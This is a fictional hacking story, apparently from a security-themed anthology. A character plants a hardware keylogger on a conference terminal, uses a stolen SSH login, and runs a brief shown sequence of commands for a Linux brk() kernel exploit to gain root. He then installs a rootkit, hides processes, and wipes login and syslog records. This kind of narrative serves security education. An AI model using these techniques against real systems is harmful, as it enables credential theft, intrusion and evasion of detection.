Throwaway Account

Throwaway Account

Sendai decides to venture outside after all these days writing Shrax. Perhaps a day at the theatre, on the beach , or attending a game would be good for him. Instead, Sendai heads for the annual ASR Cryptography Conference. He cannot afford the presentations, but hopes to gain free schwag at the giant expo. He won a Sharp Zaurus PDA the last time, which is wonderful for warwalking to find open WAPs. Sendai brings it along in case they have wireless access at the conference.

Although ASR does offer free wireless connectivity, they attempt to secure it with 802.1X and PEAP authentication. That major hassle causes lines at the free wired terminals. Although Sendai would have checked his mail over ssh (after verifying server s ssh key) from his Zaurus, he certainly will not do so from the terminal pavilion. Even if he trusted the ASR organizers (which he does not), they are totally exposed for any hacker to plug in a keylogger or defeat the software and install a program to do the same. In that instant, Sendai s expression turns from outrage to a mischievous grin as he recognizes this as a source of throwaway accounts!

The next morning, Sendai arrives early at ASR to beat the crowds. He takes an available terminal and loads Slashdot. Feigning frustration, he turns to the back of the machine and unplugs the PS/2 keyboard cable. He blows on the PS/2 port behind the machine, while his hands are inconspicuously slipping the KeyGhost SX onto the cable. This tiny device stores up to two million keystrokes and supposedly even encrypts them so that other troublemakers at ASR cannot steal the passwords. ^[5] Sendai plugs the keyboard cable back in with his little addition, turns back to the front, and resumes web surfing. He smiles to complete his little act that the machine had been broken and is now working again. Darn those dusty keyboard ports! Nobody paid the least attention to him during his charade and he could have been far more blatant without attracting any attention, but it never hurts to be careful. Plus it makes him feel sneaky and clever.

Attaching the Keyghost to Terminal Keyboard Cable

Sendai spends the next few hours at the expo collecting T-shirts, software CDs, pens, a pair of boxer shorts, an NSA pin and bag, magazines, and a bunch of candy treats. After a series of recent Internet worms, many vendors apparently decided that worm-themed giveaways would be clever and unique. Sendai was stuck with gummy worms, refrigerator magnet worms, and a keychain worm. He is tempted to watch the terminals from nearby to ensure nobody steals his $200 KeyGhost. Then he realizes that even if he watches someone discover and take it, he cannot risk a scene by approaching and yelling Hey! That s my keylogger! Sendai leaves for a long lunch and then spends a couple hours browsing at a nearby computer superstore.

Late in the afternoon, Sendai returns to ASR, hoping the keylogger remains undetected. He breathes a sigh of relief when it is right where he left it. The terminal is open, so Sendai simply repeats his broken system act and 10 minutes later is driving home with all the evidence in his pocket.

At home, Sendai quickly plugs the Keyghost into his system to check the booty. Sendai opens up the vi editor and types his passphrase. Upon recognizing this code, the KeyGhost takes over and types a menu. Sendai types 1 for entire download and watches as pages and pages of text fill the screen. Scrolling through, he sees that the vast majority of users do little more than surf the web. Security sites such as securityfocus.com, packetstormsecurity.nl, securiteam .com, and phrack.org are popular. Many folks made the mistake of checking their Hotmail or Yahoo webmail from the terminals. Sendai has little interest in such accounts. There are also a surprising number of porn sites. No purchases with typed credit card numbers , unfortunately . Search engine queries are interesting. One user searched for windows source torrent, another for lsass.exe, and someone else seeks security jobs iraq.

Downloading Keyghost Logs

Sendai starts to worry when he passes over half the file without a single remote login. The few people who open terminal sessions only execute simple commands like ls and cat /etc/passwd . Seventy percent into the file, Sendai discovers promising data: A user logged in as antonio via ssh to psyche.ncrack.com. Sendai scans through the following commands, hoping the user will run su and type the password to become the root superuser. There is no such luck ”Antonio simply reads his e-mail with mutt, sends a note to a coworker describing the conference, then disconnects. In all the excitement of reading keystroke logs, Sendai almost forgets to erase the Keyghost and remove it from his system. If he were to be convicted later based on evidence from his own keylogger, Sendai would be the laughing stock of the criminal hacker community. Such a gaffe reminds him of all the hackers who have been caught based on evidence logged from the packet sniffer they installed on a compromised box.

The keystroke logs contain no further remote system passwords, so Sendai tries to make the most of psyche.ncrack.com. He moves to the laptop (which is still associated with the linksys WAP) and successfully logs in to Psyche. Now the pressure is on, as he must move fast to avoid detection. His first action is to run the w command to see who else is online. He is relieved that the real antonio is not online, but two other users are. Hopefully they do not notice this suspicious antonio login from an unusual IP address. An attempt by them to chat with the imposter antonio could be a disaster as well. Feeling vulnerable and exposed, Sendai focuses on the task at hand. He runs uname -a to determine that Psyche is running the Linux 2.4.20 kernel. The distribution is Red Hat 9 according to /etc/redhat-release. Sendai immediately thinks of the brk() kernel exploit for kernels up to 2.4.22. That bug was unknown to the public until it was used to compromise many Debian Project machines. Sendai was a little miffed that he had not been in on it during that pre-publication 0-day period. It is a very interesting bug, and Sendai had spent two days massaging assembly code into a working exploit. It is about to come in handy. He uploads hd-brk.asm and types:

 psyche> nasm -f elf -o hd-brk.o hd-brk.asm psyche> ld -o hd-brk hd-brk.o -Ttext 0x0xa0000000 psyche> ./hd-brk # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) # 

Despite the hundreds of boxes that Sendai has compromised in his lifetime (legally or not), he never fails to feel a joyful rush of triumph when he first sees that glorious hash prompt signifying root access! But this is still only a minor victory, as the purpose of Psyche is simply to cover Sendai s tracks. There would be no time for celebration even if it was warranted, as there is now a suspicious root shell that other users might notice.

Sendai turns his attention to rootkit installation. The command lsmod shows that the kernel allows modules and that almost 50 of them are installed. This is typical for kernels from major Linux distributions. Sendai injects Shrax into the parport_pc module which, as the name implies, handles PC parallel ports. It is loaded early and unlikely to be changed, meeting the two most desirable attributes. It is also easy to remove and then re-insert the parallel port module without attracting attention. Sendai does so.

With the rootkit seemingly installed, Sendai tests his power. He issues the Shrax hideall command against the sshd process through which he is connected. Suddenly that sshd and all of its descendants (including his rootshell) are now hidden from system process lists. Their syslog messages are ignored and sockets are concealed. Sendai wipes the relevant wtmp, lastlog, and syslog records to remove any trace that antonio logged on this evening. He checks up on the other two logged in users with the TTY sniffer to ensure that they are doing their own thing and not suspecting that anything is remiss. Sendai lightly tests a few complex system components including the compiler gcc and emacs. One of the most common ways attackers are discovered is that they inadvertently break something. The generally attentive Debian folks did not notice intruders until kernel crashes began occurring on several boxes at once. Sendai is glad that no problems have yet appeared with Shrax. A feeling of relief rolls over him as he can now relax. His activities on the system are well hidden now that Psyche is securely 0wn3d.